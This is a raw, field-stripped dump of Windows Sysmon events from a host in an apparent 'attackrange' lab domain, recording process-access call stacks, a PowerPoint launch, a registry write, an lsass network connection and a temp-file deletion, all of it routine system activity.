14:58:40.638{A7A01FEF-B636-607E-2700-00000000BB01}27245648C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000080458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.638{A7A01FEF-B636-607E-2700-00000000BB01}27245648C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 354300x800000000000000080457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:38.911{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal52539-false10.0.1.14win-dc-339.attackrange.local49676- 10341000x800000000000000080456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.372{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.372{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.372{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000080453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDBSetValue2021-04-20 14:58:40.357{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEBinary Data 10341000x800000000000000080452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-C0A6-607E-8105-00000000BB01}8363768C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-C0A6-607E-8105-00000000BB01}8363768C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-B626-607E-1300-00000000BB01}12642404C:\Windows\System32\svchost.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-B626-607E-1300-00000000BB01}12642404C:\Windows\System32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.357{A7A01FEF-C0A6-607E-8105-00000000BB01}8363516C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e69f|C:\Windows\System32\windows.storage.dll+16e315|C:\Windows\System32\windows.storage.dll+16de06|C:\Windows\System32\windows.storage.dll+16f278|C:\Windows\System32\windows.storage.dll+16dc2e|C:\Windows\System32\windows.storage.dll+fd025|C:\Windows\System32\windows.storage.dll+fd3a4|C:\Windows\System32\windows.storage.dll+fc9e0|C:\Windows\System32\windows.storage.dll+16650e|C:\Windows\System32\windows.storage.dll+166202|C:\Windows\System32\SHELL32.dll+3f8cd|C:\Windows\System32\SHELL32.dll+3e466|C:\Windows\System32\SHELL32.dll+80201|C:\Windows\System32\SHELL32.dll+6718e|C:\Windows\System32\windows.storage.dll+2d1b2|C:\Windows\System32\windows.storage.dll+2cea9|C:\Windows\System32\windows.storage.dll+2cd7f|C:\Windows\System32\SHELL32.dll+80287|C:\Windows\System32\SHELL32.dll+6718e|C:\Windows\System32\SHELL32.dll+1740bf 154100x800000000000000080440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.334{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE16.0.13127.21348Microsoft PowerPointMicrosoft OfficeMicrosoft CorporationPOWERPNT.EXE"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE" C:\Windows\system32\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=8360E80A7405C09596EC63B94E801216,SHA256=9AC7BDE91B31367EDDB57629E8D87C3AD87107C520A03AA25735374BC6494FBB,IMPHASH=5DB7D8EEBE8F06F450AAFCA16D7FB09D{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x800000000000000080439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.341{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\tmp7AA2.tmpMD5=9E936C2078B286132CD6B9C8602FD17A,SHA256=FA994BADB1E90B2629E0D955572CA57EFE97169D20D6B4957E2F830E3680DA9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.310{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.310{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.310{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000080435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.310{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.servic